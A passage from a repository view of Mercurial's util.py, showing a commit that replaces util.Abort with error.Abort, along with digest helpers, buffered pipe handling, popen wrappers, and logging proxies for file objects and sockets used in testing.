util: drop util.Abort in favor of error.Abort (API)...
Yuya Nishihara
r37116:a9ea2b1e default
@@ -1,4094 +1,4092 @@
# util.py - Mercurial utility functions and platform specific implementations
#
# Copyright 2005 K. Thananchayan <thananck@yahoo.com>
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

"""Mercurial utility functions and platform specific implementations.

This contains helper routines that are independent of the SCM core and
hide platform-specific details from the core.
"""

from __future__ import absolute_import, print_function

import abc
import bz2
import collections
import contextlib
import errno
import gc
import hashlib
import imp
import io
import itertools
import mmap
import os
import platform as pyplatform
import re as remod
import shutil
import signal
import socket
import stat
import subprocess
import sys
import tempfile
import time
import traceback
import warnings
import zlib

from . import (
    encoding,
    error,
    i18n,
    node as nodemod,
    policy,
    pycompat,
    urllibcompat,
)
from .utils import (
    dateutil,
    stringutil,
)

base85 = policy.importmod(r'base85')
osutil = policy.importmod(r'osutil')
parsers = policy.importmod(r'parsers')

b85decode = base85.b85decode
b85encode = base85.b85encode

cookielib = pycompat.cookielib
empty = pycompat.empty
httplib = pycompat.httplib
pickle = pycompat.pickle
queue = pycompat.queue
socketserver = pycompat.socketserver
stderr = pycompat.stderr
stdin = pycompat.stdin
stdout = pycompat.stdout
bytesio = pycompat.bytesio
# TODO deprecate stringio name, as it is a lie on Python 3.
stringio = bytesio
xmlrpclib = pycompat.xmlrpclib

httpserver = urllibcompat.httpserver
urlerr = urllibcompat.urlerr
urlreq = urllibcompat.urlreq

# workaround for win32mbcs
_filenamebytestr = pycompat.bytestr

def isatty(fp):
    try:
        return fp.isatty()
    except AttributeError:
        return False

# glibc determines buffering on first write to stdout - if we replace a TTY
# destined stdout with a pipe destined stdout (e.g. pager), we want line
# buffering
if isatty(stdout):
    stdout = os.fdopen(stdout.fileno(), r'wb', 1)

if pycompat.iswindows:
    from . import windows as platform
    stdout = platform.winstdout(stdout)
else:
    from . import posix as platform

_ = i18n._

bindunixsocket = platform.bindunixsocket
cachestat = platform.cachestat
checkexec = platform.checkexec
checklink = platform.checklink
copymode = platform.copymode
expandglobs = platform.expandglobs
explainexit = platform.explainexit
findexe = platform.findexe
getfsmountpoint = platform.getfsmountpoint
getfstype = platform.getfstype
gethgcmd = platform.gethgcmd
getuser = platform.getuser
getpid = os.getpid
groupmembers = platform.groupmembers
groupname = platform.groupname
hidewindow = platform.hidewindow
isexec = platform.isexec
isowner = platform.isowner
listdir = osutil.listdir
localpath = platform.localpath
lookupreg = platform.lookupreg
makedir = platform.makedir
nlinks = platform.nlinks
normpath = platform.normpath
normcase = platform.normcase
normcasespec = platform.normcasespec
normcasefallback = platform.normcasefallback
openhardlinks = platform.openhardlinks
oslink = platform.oslink
parsepatchoutput = platform.parsepatchoutput
pconvert = platform.pconvert
poll = platform.poll
popen = platform.popen
posixfile = platform.posixfile
quotecommand = platform.quotecommand
readpipe = platform.readpipe
rename = platform.rename
removedirs = platform.removedirs
samedevice = platform.samedevice
samefile = platform.samefile
samestat = platform.samestat
setbinary = platform.setbinary
setflags = platform.setflags
setsignalhandler = platform.setsignalhandler
shellquote = platform.shellquote
shellsplit = platform.shellsplit
spawndetached = platform.spawndetached
split = platform.split
sshargs = platform.sshargs
statfiles = getattr(osutil, 'statfiles', platform.statfiles)
statisexec = platform.statisexec
statislink = platform.statislink
testpid = platform.testpid
umask = platform.umask
unlink = platform.unlink
username = platform.username

try:
    recvfds = osutil.recvfds
except AttributeError:
    pass
try:
    setprocname = osutil.setprocname
except AttributeError:
    pass
try:
    unblocksignal = osutil.unblocksignal
except AttributeError:
    pass

# Python compatibility

_notset = object()

def safehasattr(thing, attr):
    return getattr(thing, attr, _notset) is not _notset

def _rapply(f, xs):
    if xs is None:
        # assume None means non-value of optional data
        return xs
    if isinstance(xs, (list, set, tuple)):
        return type(xs)(_rapply(f, x) for x in xs)
    if isinstance(xs, dict):
        return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
    return f(xs)

def rapply(f, xs):
    """Apply function recursively to every item preserving the data structure

    >>> def f(x):
    ...     return 'f(%s)' % x
    >>> rapply(f, None) is None
    True
    >>> rapply(f, 'a')
    'f(a)'
    >>> rapply(f, {'a'}) == {'f(a)'}
    True
    >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
    ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]

    >>> xs = [object()]
    >>> rapply(pycompat.identity, xs) is xs
    True
    """
    if f is pycompat.identity:
        # fast path mainly for py2
        return xs
    return _rapply(f, xs)

def bitsfrom(container):
    bits = 0
    for bit in container:
        bits |= bit
    return bits
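
# Illustrative sketch (not part of the original module): bitsfrom() simply
# ORs together an iterable of flag bits, e.g.
#
#   bitsfrom([stat.S_IRUSR, stat.S_IWUSR])   # -> 0o600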

# Python 2.6 still has deprecation warnings enabled by default. We do not
# want to display anything to standard users, so detect if we are running
# tests and only use Python deprecation warnings in that case.
_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, module name set through PYTHONWARNINGS was exactly matched, so
    # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
    # makes the whole PYTHONWARNINGS thing useless for our usecase.
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
if _dowarn and pycompat.ispy3:
    # silence warning emitted by passing user string to re.sub()
    warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
                            r'mercurial')
    warnings.filterwarnings(r'ignore', r'invalid escape sequence',
                            DeprecationWarning, r'mercurial')

def nouideprecwarn(msg, version, stacklevel=1):
    """Issue a Python-native deprecation warning

    This is a no-op outside of tests; use 'ui.deprecwarn' when possible.
    """
    if _dowarn:
        msg += ("\n(compatibility will be dropped after Mercurial-%s,"
                " update your code.)") % version
        warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
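
# Illustrative sketch (not part of the original module): the warning below is
# only emitted when HGEMITWARNINGS is set, i.e. under the test runner.
#
#   nouideprecwarn(b'foo() is deprecated, use bar()', b'4.6', stacklevel=2)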

DIGESTS = {
    'md5': hashlib.md5,
    'sha1': hashlib.sha1,
    'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS

class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise error.Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        if key not in DIGESTS:
            raise error.Abort(_('unknown digest type: %s') % key)
        return nodemod.hex(self._hashes[key].digest())

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None

class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

        d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size
        self._got = 0
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        content = self._fh.read(length)
        self._digester.update(content)
        self._got += len(content)
        return content

    def validate(self):
        if self._size != self._got:
            raise error.Abort(_('size mismatch: expected %d, got %d') %
                              (self._size, self._got))
        for k, v in self._digests.items():
            if v != self._digester[k]:
                # i18n: first parameter is a digest name
                raise error.Abort(_('%s mismatch: expected %s, got %s') %
                                  (k, v, self._digester[k]))
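
# Illustrative sketch (not part of the original module): validate an
# in-memory stream against its size and md5 digest; the literal below is the
# md5 of b'foo' (see the digester doctest above).
#
#   fh = digestchecker(bytesio(b'foo'), 3,
#                      {'md5': 'acbd18db4cc2f85cedef654fccc4a4d8'})
#   assert fh.read() == b'foo'
#   fh.validate()   # raises error.Abort on size or digest mismatch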

try:
    buffer = buffer
except NameError:
    def buffer(sliceable, offset=0, length=None):
        if length is not None:
            return memoryview(sliceable)[offset:offset + length]
        return memoryview(sliceable)[offset:]
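
# Illustrative sketch (not part of the original module): on Python 3 the
# fallback above yields zero-copy memoryview slices, e.g.
#
#   bytes(buffer(b'abcdef', 2, 3))   # -> b'cde'
#   bytes(buffer(b'abcdef', 4))      # -> b'ef'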

closefds = pycompat.isposix

_chunksize = 4096

class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class lets us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """
    def __new__(cls, fh):
        # If we receive a fileobjectproxy, we need to use a variation of this
        # class that notifies observers about activity.
        if isinstance(fh, fileobjectproxy):
            cls = observedbufferedinputpipe

        return super(bufferedinputpipe, cls).__new__(cls)

    def __init__(self, input):
        self._input = input
        self._buffer = []
        self._eof = False
        self._lenbuf = 0

    @property
    def hasbuffer(self):
        """True if any data is currently buffered

        This will be used externally as a pre-step for polling IO. If there is
        already data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        while (not self._eof) and (self._lenbuf < size):
            self._fillbuffer()
        return self._frombuffer(size)

    def readline(self, *args, **kwargs):
        if 1 < len(self._buffer):
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapses it.
            self._buffer = [''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find('\n')
        while (not self._eof) and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find('\n')
        size = lfi + 1
        if lfi < 0: # end of file
            size = self._lenbuf
        elif 1 < len(self._buffer):
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        buf = self._buffer[0]
        if 1 < len(self._buffer):
            buf = ''.join(self._buffer)

        data = buf[:size]
        buf = buf[len(data):]
        if buf:
            self._buffer = [buf]
            self._lenbuf = len(buf)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self):
        """read data to the buffer"""
        data = os.read(self._input.fileno(), _chunksize)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)

        return data
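
# Illustrative sketch (not part of the original module; 'rfd' is a
# hypothetical pipe descriptor): consult the internal buffer before polling
# so already-buffered data is not missed.
#
#   p = bufferedinputpipe(os.fdopen(rfd, r'rb'))
#   if p.hasbuffer or poll([p.fileno()]):
#       line = p.readline()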

def mmapread(fp):
    try:
        fd = getattr(fp, 'fileno', lambda: fp)()
        return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work. Check
        # if the file is empty, and if so, return an empty buffer.
        if os.fstat(fd).st_size == 0:
            return ''
        raise
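
# Illustrative sketch (not part of the original module; the path is
# hypothetical): map a file for cheap random access; empty files fall back
# to an empty buffer instead of raising.
#
#   with open(r'store/data', 'rb') as fp:
#       data = mmapread(fp)
#       header = data[:4]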

def popen2(cmd, env=None, newlines=False):
    # Setting bufsize to -1 lets the system decide the buffer size.
    # The default for bufsize is 0, meaning unbuffered. This leads to
    # poor performance on Mac OS X: http://bugs.python.org/issue4194
    p = subprocess.Popen(cmd, shell=True, bufsize=-1,
                         close_fds=closefds,
                         stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                         universal_newlines=newlines,
                         env=env)
    return p.stdin, p.stdout

def popen3(cmd, env=None, newlines=False):
    stdin, stdout, stderr, p = popen4(cmd, env, newlines)
    return stdin, stdout, stderr

def popen4(cmd, env=None, newlines=False, bufsize=-1):
    p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
                         close_fds=closefds,
                         stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE,
                         universal_newlines=newlines,
                         env=env)
    return p.stdin, p.stdout, p.stderr, p
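
# Illustrative sketch (not part of the original module; the command is
# hypothetical): capture stdout and stderr of a shell command, then reap the
# child.
#
#   stdin, out, err, p = popen4(b'hg id')
#   stdin.close()
#   output, errors = out.read(), err.read()
#   p.wait()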

class fileobjectproxy(object):
    """A proxy around file objects that tells a watcher when events occur.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, fh, observer):
        object.__setattr__(self, r'_orig', fh)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        ours = {
            r'_observer',

            # IOBase
            r'close',
            # closed if a property
            r'fileno',
            r'flush',
            r'isatty',
            r'readable',
            r'readline',
            r'readlines',
            r'seek',
            r'seekable',
            r'tell',
            r'truncate',
            r'writable',
            r'writelines',
            # RawIOBase
            r'read',
            r'readall',
            r'readinto',
            r'write',
            # BufferedIOBase
            # raw is a property
            r'detach',
            # read defined above
            r'read1',
            # readinto defined above
            # write defined above
        }

        # We only observe some methods.
        if name in ours:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __iter__(self):
        return object.__getattribute__(self, r'_orig').__iter__()

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def close(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'close', *args, **kwargs)

    def fileno(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'fileno', *args, **kwargs)

    def flush(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'flush', *args, **kwargs)

    def isatty(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'isatty', *args, **kwargs)

    def readable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readable', *args, **kwargs)

    def readline(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readline', *args, **kwargs)

    def readlines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readlines', *args, **kwargs)

    def seek(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seek', *args, **kwargs)

    def seekable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seekable', *args, **kwargs)

    def tell(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'tell', *args, **kwargs)

    def truncate(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'truncate', *args, **kwargs)

    def writable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writable', *args, **kwargs)

    def writelines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writelines', *args, **kwargs)

    def read(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read', *args, **kwargs)

    def readall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readall', *args, **kwargs)

    def readinto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readinto', *args, **kwargs)

    def write(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'write', *args, **kwargs)

    def detach(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'detach', *args, **kwargs)

    def read1(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read1', *args, **kwargs)

class observedbufferedinputpipe(bufferedinputpipe):
    """A variation of bufferedinputpipe that is aware of fileobjectproxy.

    ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
    bypass ``fileobjectproxy``. Because of this, we need to make
    ``bufferedinputpipe`` aware of these operations.

    This variation of ``bufferedinputpipe`` can notify observers about
    ``os.read()`` events. It also re-publishes other events, such as
    ``read()`` and ``readline()``.
    """
    def _fillbuffer(self):
        res = super(observedbufferedinputpipe, self)._fillbuffer()

        fn = getattr(self._input._observer, r'osread', None)
        if fn:
            fn(res, _chunksize)

        return res

    # We use different observer methods because the operation isn't
    # performed on the actual file object but on us.
    def read(self, size):
        res = super(observedbufferedinputpipe, self).read(size)

        fn = getattr(self._input._observer, r'bufferedread', None)
        if fn:
            fn(res, size)

        return res

    def readline(self, *args, **kwargs):
        res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)

        fn = getattr(self._input._observer, r'bufferedreadline', None)
        if fn:
            fn(res)

        return res

PROXIED_SOCKET_METHODS = {
    r'makefile',
    r'recv',
    r'recvfrom',
    r'recvfrom_into',
    r'recv_into',
    r'send',
    r'sendall',
    r'sendto',
    r'setblocking',
    r'settimeout',
    r'gettimeout',
    r'setsockopt',
}

class socketproxy(object):
    """A proxy around a socket that tells a watcher when events occur.

    This is like ``fileobjectproxy`` except for sockets.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, sock, observer):
        object.__setattr__(self, r'_orig', sock)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        if name in PROXIED_SOCKET_METHODS:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def makefile(self, *args, **kwargs):
        res = object.__getattribute__(self, r'_observedcall')(
            r'makefile', *args, **kwargs)

        # The file object may be used for I/O. So we turn it into a
        # proxy using our observer.
        observer = object.__getattribute__(self, r'_observer')
        return makeloggingfileobject(observer.fh, res, observer.name,
                                     reads=observer.reads,
                                     writes=observer.writes,
                                     logdata=observer.logdata,
                                     logdataapis=observer.logdataapis)

    def recv(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recv', *args, **kwargs)

    def recvfrom(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom', *args, **kwargs)

    def recvfrom_into(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom_into', *args, **kwargs)

    def recv_into(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recv_into', *args, **kwargs)

    def send(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'send', *args, **kwargs)

    def sendall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'sendall', *args, **kwargs)

    def sendto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'sendto', *args, **kwargs)

    def setblocking(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'setblocking', *args, **kwargs)

    def settimeout(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'settimeout', *args, **kwargs)

    def gettimeout(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'gettimeout', *args, **kwargs)

    def setsockopt(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'setsockopt', *args, **kwargs)
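
# Illustrative sketch (not part of the original module; 'sock' and 'logfh'
# are hypothetical): wire a socket to an observer directly; socketobserver
# is defined below.
#
#   observed = socketproxy(sock, socketobserver(logfh, b'conn'))
#   observed.send(b'ping')   # forwarded to the socket, then logged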

class baseproxyobserver(object):
    def _writedata(self, data):
        if not self.logdata:
            if self.logdataapis:
                self.fh.write('\n')
                self.fh.flush()
            return

        # Simple case writes all data on a single line.
        if b'\n' not in data:
            if self.logdataapis:
                self.fh.write(': %s\n' % stringutil.escapedata(data))
            else:
                self.fh.write('%s> %s\n'
                              % (self.name, stringutil.escapedata(data)))
            self.fh.flush()
            return

        # Data with newlines is written to multiple lines.
        if self.logdataapis:
            self.fh.write(':\n')

        lines = data.splitlines(True)
        for line in lines:
            self.fh.write('%s> %s\n'
                          % (self.name, stringutil.escapedata(line)))
        self.fh.flush()

class fileobjectobserver(baseproxyobserver):
    """Logs file object activity."""
    def __init__(self, fh, name, reads=True, writes=True, logdata=False,
                 logdataapis=True):
        self.fh = fh
        self.name = name
        self.logdata = logdata
        self.logdataapis = logdataapis
        self.reads = reads
        self.writes = writes

    def read(self, res, size=-1):
        if not self.reads:
            return
        # Python 3 can return None from reads at EOF instead of empty strings.
        if res is None:
            res = ''

        if self.logdataapis:
            self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))

        self._writedata(res)

    def readline(self, res, limit=-1):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readline() -> %d' % (self.name, len(res)))

        self._writedata(res)

    def readinto(self, res, dest):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
                                                      res))

        data = dest[0:res] if res is not None else b''
        self._writedata(data)

    def write(self, res, data):
        if not self.writes:
            return

        # Python 2 returns None from some write() calls. Python 3 (reasonably)
        # returns the integer bytes written.
        if res is None and data:
            res = len(data)

        if self.logdataapis:
            self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))

        self._writedata(data)

    def flush(self, res):
        if not self.writes:
            return

        self.fh.write('%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedread(%d) -> %d' % (
                self.name, size, len(res)))

        self._writedata(res)

    def bufferedreadline(self, res):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedreadline() -> %d' % (
                self.name, len(res)))

        self._writedata(res)

def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
                          logdata=False, logdataapis=True):
    """Turn a file object into a logging file object."""

    observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
                                  logdata=logdata, logdataapis=logdataapis)
    return fileobjectproxy(fh, observer)
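
# Illustrative sketch (not part of the original module; 'fh' and the log
# path are hypothetical): mirror all I/O on a file object into a log.
#
#   logfh = open(r'io.log', 'wb')
#   proxied = makeloggingfileobject(logfh, fh, b'client', logdata=True)
#   proxied.write(b'hello')   # performs the write, then logs it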

class socketobserver(baseproxyobserver):
    """Logs socket activity."""
    def __init__(self, fh, name, reads=True, writes=True, states=True,
                 logdata=False, logdataapis=True):
        self.fh = fh
        self.name = name
        self.reads = reads
        self.writes = writes
        self.states = states
        self.logdata = logdata
        self.logdataapis = logdataapis

    def makefile(self, res, mode=None, bufsize=None):
        if not self.states:
            return

        self.fh.write('%s> makefile(%r, %r)\n' % (
            self.name, mode, bufsize))

    def recv(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv(%d, %d) -> %d' % (
                self.name, size, flags, len(res)))
        self._writedata(res)

    def recvfrom(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
                self.name, size, flags, len(res[0])))

        self._writedata(res[0])

    def recvfrom_into(self, res, buf, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
                self.name, size, flags, res[0]))

        self._writedata(buf[0:res[0]])

    def recv_into(self, res, buf, size=0, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv_into(%d, %d) -> %d' % (
                self.name, size, flags, res))

        self._writedata(buf[0:res])

    def send(self, res, data, flags=0):
        if not self.writes:
            return

993 self.fh.write('%s> send(%d, %d) -> %d' % (
993 self.fh.write('%s> send(%d, %d) -> %d' % (
994 self.name, len(data), flags, len(res)))
994 self.name, len(data), flags, len(res)))
995 self._writedata(data)
995 self._writedata(data)
996
996
997 def sendall(self, res, data, flags=0):
997 def sendall(self, res, data, flags=0):
998 if not self.writes:
998 if not self.writes:
999 return
999 return
1000
1000
1001 if self.logdataapis:
1001 if self.logdataapis:
1002 # Returns None on success. So don't bother reporting return value.
1002 # Returns None on success. So don't bother reporting return value.
1003 self.fh.write('%s> sendall(%d, %d)' % (
1003 self.fh.write('%s> sendall(%d, %d)' % (
1004 self.name, len(data), flags))
1004 self.name, len(data), flags))
1005
1005
1006 self._writedata(data)
1006 self._writedata(data)
1007
1007
1008 def sendto(self, res, data, flagsoraddress, address=None):
1008 def sendto(self, res, data, flagsoraddress, address=None):
1009 if not self.writes:
1009 if not self.writes:
1010 return
1010 return
1011
1011
1012 if address:
1012 if address:
1013 flags = flagsoraddress
1013 flags = flagsoraddress
1014 else:
1014 else:
1015 flags = 0
1015 flags = 0
1016
1016
1017 if self.logdataapis:
1017 if self.logdataapis:
1018 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
1018 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
1019 self.name, len(data), flags, address, res))
1019 self.name, len(data), flags, address, res))
1020
1020
1021 self._writedata(data)
1021 self._writedata(data)
1022
1022
1023 def setblocking(self, res, flag):
1023 def setblocking(self, res, flag):
1024 if not self.states:
1024 if not self.states:
1025 return
1025 return
1026
1026
1027 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
1027 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
1028
1028
1029 def settimeout(self, res, value):
1029 def settimeout(self, res, value):
1030 if not self.states:
1030 if not self.states:
1031 return
1031 return
1032
1032
1033 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
1033 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
1034
1034
1035 def gettimeout(self, res):
1035 def gettimeout(self, res):
1036 if not self.states:
1036 if not self.states:
1037 return
1037 return
1038
1038
1039 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
1039 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
1040
1040
    def setsockopt(self, res, level, optname, value):
        if not self.states:
            return

        self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
            self.name, level, optname, value, res))

def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
                      logdata=False, logdataapis=True):
    """Turn a socket into a logging socket."""

    observer = socketobserver(logh, name, reads=reads, writes=writes,
                              states=states, logdata=logdata,
                              logdataapis=logdataapis)
    return socketproxy(fh, observer)

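# A minimal usage sketch for makeloggingsocket; the ui handle and the
# b'client' label here are hypothetical stand-ins:
#
#   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   s = makeloggingsocket(ui.ferr, s, b'client', logdata=True)
#   s.sendall(b'ping')    # emits "client> sendall(4, 0)" plus the payload
#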
def version():
    """Return version information if available."""
    try:
        from . import __version__
        return __version__.version
    except ImportError:
        return 'unknown'

def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
